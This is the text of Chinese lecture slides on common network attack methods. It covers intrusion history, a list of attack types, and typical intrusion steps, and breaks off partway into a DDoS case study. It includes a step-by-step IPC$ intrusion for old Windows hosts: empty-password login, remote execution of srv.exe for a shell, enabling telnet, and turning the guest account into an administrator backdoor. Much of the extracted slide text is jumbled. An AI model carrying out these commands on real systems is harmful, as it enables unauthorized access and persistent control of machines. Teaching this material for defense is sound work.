网络攻击的常见手段与防范措施讲义.ppt

1980 1985 1990 1995 2000 密码猜测 可自动复制的代码 密码破解 利用已知的漏洞 破坏审计系统 后门 会话劫持 擦除痕迹 嗅探 包欺骗 GUI远程控制 自动探测扫描 拒绝服务 www 攻击 工具 攻击者 入侵者水平 攻击手法 半开放隐蔽扫描 控制台入侵 检测网络管理 DDOS 攻击 2002 高 入侵技术的发展 01 入侵技术的历史和发展 02 一般攻击步骤 03 攻击实例与攻击方式 目 录 常见的攻击方法 端口扫描：网络攻击的前奏 网络监听：局域网、HUB、ARP欺骗、网关设备 邮件攻击：邮件炸弹、邮件欺骗 网页欺骗：伪造网址、DNS重定向 密码破解：字典破解、暴力破解、md5解密 漏洞攻击：溢出攻击、系统漏洞利用 种植木马：隐蔽、免杀、网站挂马、邮件挂马 DoS、DDoS：拒绝服务攻击、分布式拒绝服务攻击 cc攻击：借助大量代理或肉鸡访问最耗资源的网页 XSS跨站攻击、SQL注入：利用变量检查不严格构造javascript语句挂马或获取用户信息，或构造sql语句猜测表、字段以及管理员账号密码 社会工程学：QQ数据库被盗 端口 判断 判断 系统 选择 最简 方式 入侵 分析 可能 有漏 洞的 服务 获取 系统 一定 权限 提 升 为 最 高 权 限 安装 多个 系统 后门 清除 入侵 脚印 攻击其 他系统 获取敏 感信息 作为其 他用途 常见的系统入侵步骤 IP地址、主机是否运行、到要入侵点的路由、主机操作系统与用户信息等。 攻击步骤 1.收集主机信息 　Ping命令判断计算机是否开着，或者数据包发送到返回需要多少时间 　Tracert/Tracerout命令跟踪从一台计算机到另外一台计算机所走的路径 　Finger和Rusers命令收集用户信息 　Host或者Nslookup命令，结合Whois和Finger命令获取主机、操作系统和用户等信息 应用的方法： 获取网络服务的端口作为入侵通道。 2.端口扫描 1.TCP Connect() 2.TCP SYN 3.TCP FIN 4.IP段扫瞄 5.TCP反向Ident扫瞄 6.FTP代理扫瞄 7.UDP ICMP不到达扫瞄 7种扫瞄类型： 3、系统漏洞利用 一次利用ipc$的入侵过程 1. C:\net use \\x.x.x.x\IPC$ “” /user:“admintitrator”用“流光”扫的用户名是administrator，密码为“空”的IP地址　 2. C:\copy srv.exe \\x.x.x.x\admin$ 先复制srv.exe上去，在流光的Tools目录下 3. C:\net time \\x.x.x.x 查查时间，发现x.x.x.x 的当前时间是 2003/3/19 上午 11:00，命令成功完成。 4. C:\at \\x.x.x.x 11:05 srv.exe 用at命令启动srv.exe吧（这里设置的时间要比主机时间推后） 5. C:\net time \\x.x.x.x再查查时间到了没有，如果x.x.x.x 的当前时间是 2003/3/19 上午 11:05，那就准备开始下面的命令。 6. C:\telnet x.x.x.x 99 这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了 7.C:\copy ntlm.exe \\\admin$ntlm.exe也在《流光》的Tools目录中　　 8. C:\WINNT\system32ntlm 输入ntlm启动（这里的C:\WINNT\system32是在对方计算机上运行当出现“DONE”的时候，就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务) 9. Telnet x.x.x.x，接着输入用户名与密码就进入对方了 10. C:\net user guest /active:yes 为了方便日后登陆,将guest激活并加到管理组 11. C:\net user guest 1234 将Guest的密码改为1234 12. C:\net localgroup administrators guest /add 将Guest变为Administrator 01 入侵技术的历史和发展 02 一般攻击步骤 03 攻击实例与攻击方式 目 录 北京时间10月22日凌晨，美国域名服务器管理服务供应商Dyn宣布，该公司在当地时间周五早上遭遇了DDoS（分布式拒绝服务）攻击，从而导